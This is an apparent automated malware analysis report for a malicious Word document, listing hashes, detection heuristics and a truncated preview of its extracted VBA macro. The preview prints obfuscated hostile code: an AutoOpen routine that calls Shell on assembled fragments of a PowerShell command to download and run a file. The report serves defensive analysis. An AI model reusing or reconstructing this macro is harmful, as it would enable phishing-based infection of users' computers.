Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d5b8502812679333…

MALICIOUS

Office (OLE)

135.0 KB Created: 2017-12-15 10:34:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: 7882ac75ab20c751a620e6422ddc1e5a SHA-1: 1604f0396ebfa2664d6afeb40248dd9fd27e359e SHA-256: d5b8502812679333ca2b6a483099e56f8dd51ad8c595616dd6bc7cd9d558bb40
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an intent to execute external commands. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure designed to drop further malicious content. The VBA code appears to be obfuscated, but the presence of the Shell() call is a critical indicator of malicious activity.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 57356 bytes
SHA-256: 076d11e3ff3201942fe195d8f29f30265b55d8add2534a2c77f7e75ca1aa9e23
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DLUTqTPBlPS"
Sub AutoOpen()
On Error Resume Next
FmwztzWOqZC = IsNull("bXjzpjSdbMo" + "qZDQXJEutqhu" + "tHtqUlz" + "piCkcjHCG" + "tzOHUwG") + IsNull("jUHmkppzvcYnH" + "rSAqAfudwrm" + "nwmmnzkdFcKCw" + "uckfiTuTG" + "GdvawDXQAvCtNI")
aDdUOIwsnkSsR = IsNull("TuTpqjJCJ" + "CFuCCLBPbqDP" + "wsnHkIpiK" + "CjAiDWc" + "YtwSIOwpcjC") + IsNull("bKDdUwDYZ" + "UCrzrVBcwszLiW" + "jkYLufGbti" + "cWNGSEFiZubJW" + "ozkJRPfhKoM")
NiONazUAsiO = IsNull("avFAwZEbBkGjV" + "cPLvMYunq" + "QLTdoWiJltj" + "KikkkldcXi" + "IVFozSqwmEikl") + IsNull("amfCzvc" + "GFjLcoIKOEiT" + "Iihlqvwz" + "juzfJwzaZ" + "PZOAHlqBobqZB")
tSEwRGAfl = IsNull("ZmLwfKNnivDmt" + "azAtIVbGshlq" + "zITnkoabVZtWdO" + "vGOHYVX" + "FGXPNTtiL") + IsNull("PNfKITzTGEZHX" + "HYKmTdRYbqN" + "MYMIbvhhOAXl" + "vKFPSswitIpJHL" + "WrmozbGZGwdd")
VBA.Shell$ iJJGwNoD, 0
pPGBYnXTMJI = IsNull("PzTQXzUjwLXOjo" + "okwQpPXtdB" + "kTnPKhdqhimIj" + "ItbissRkRjiNtS" + "rEqOjOBwjBpk") + IsNull("GsBcPQhVwOkIW" + "CEhwoKIqZwtzkH" + "rdCHZiYhFzclNu" + "FGNPzsCEBZkQS" + "iPjaXEl")
AwVdWbwMZuvk = IsNull("nmVHFpYBioOGc" + "hvLppDXFQu" + "VbFpApUiOu" + "LSSPNhSHHWu" + "QQOEFhS") + IsNull("ValkNSLiztYN" + "EksXaqqmInz" + "XoZmkPAvMIk" + "hCuVkINwhbMf" + "hfrcvMnmJp")
lvOdXRQwzLp = IsNull("vVBAZAtwct" + "DkJTQvzuY" + "QjoukbPL" + "fJrHvHtMN" + "QtBsfLtNwzAC") + IsNull("RLilNGpZi" + "LOGLcOMWijIH" + "OrJiqNQLP" + "sawQVjGYMmH" + "dYzQzldRTIJsQ")
DXwLNZvlOljzqp = IsNull("LvVLYNkjaOf" + "zJkQEAbciZBY" + "vsKNjBvnpHMn" + "rjTnYwirzbdV" + "zPMuluwdcUa") + IsNull("qMkvICXcXI" + "JuAEqqzRjsHEfa" + "VSqDOLtSijzwoZ" + "sFoTDzl" + "GmfDtdiIEVNjF")
End Sub
Function iJJGwNoD()
On Error Resume Next
smwUnCpBA = 7 + CDbl(7 - Cos(367)) * 2689 / Fix(9) + 14 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(9) + Zaa / Oct(13))
PGOdDzbu = 14 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 11 / 10 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(11) + Zaa / Oct(9))
FUzoGP = Mid("zzBu6cDiWnR02ows1k05SAu randoA64+A6plm6rlW", 24, 12)
EpIwWV = 10 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 14 / 8 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(10) + Zaa / Oct(7))
PWpMn = 7 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 11 / 12 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(13) + Zaa / Oct(10))
TOFKt = 11 + CDbl(7 - Cos(367)) * 2689 / Fix(13) + 11 / 13 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(7) + Zaa / Oct(9))
MwMKkp = Mid("jDEOwOwY6Sq19364'+'+A64oA64+A64Vpa+VparsA64Vpa'+'+Vpa+A64.coA64+A64m/7UA64+A64doA64+A64/AVpa+Vpa64+A64,httpA6a4fGlUw7XCwtb", 15, 95)
RYTvkjNLA = 13 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 12 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(12) + Zaa / Oct(10))
TFqLidHsBXc = 10 + CDbl(7 - Cos(367)) * 2689 / Fix(12) + 14 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(12) + Zaa / Oct(7))
DVMSTLOvfA = 14 + CDbl(7 - Cos(367)) * 2689 / Fix(12) + 7 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(13) + Zaa / Oct(8))
NDPWaiZIIb = Mid("0iaW]92 -CREpLa'+'cE([CHar]120+[CHar]80+[CHar]98),['+'CHar]36  -CREpLacE VpaA64Vpa,[CHar]39) QmWIex')-REPLaCe 'QmW',[CHar]124  -crepLAGG3YFQ7iYZ", 5, 129)
npQOivAw = 11 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 11 / 14 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(9) + Zaa / Oct(7))
AjXIAXvOL = 13 + CDbl(7 - Cos(367)) * 2689 / Fix(9) + 10 / 10 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(12) + Zaa / Oct(10))
kviwhOOIccc = 9 + CDbl(7 - Cos(367)) * 2689 / Fix(8) + 13 / 9 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(10) + Zaa / Oct(12))
FuPrqwKlifO = Mid("OqLUPW0trTQhokj(Y0QA64+A64abc A64+A64iA64+A64nA64+A64 '+'YA64+A640'+'QA64+A64bc'+'d)'+'A64+A64{tryA64+A64{Y0QfA64'+'+A'+'64'+'rA64+A64an'+'cA6'+'4+A64.DowA6Vpa+Vpa4+A64nlA64+A64oadFile(Y0Qabc.ToStVpa+VparA64+A64iA6oSOYTz7l5nEXfDYZ", 16, 199)
ZJDKF = 8 + CDbl(7 - Cos(367)) * 2689 / Fix(13) + 8 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - S
... (truncated)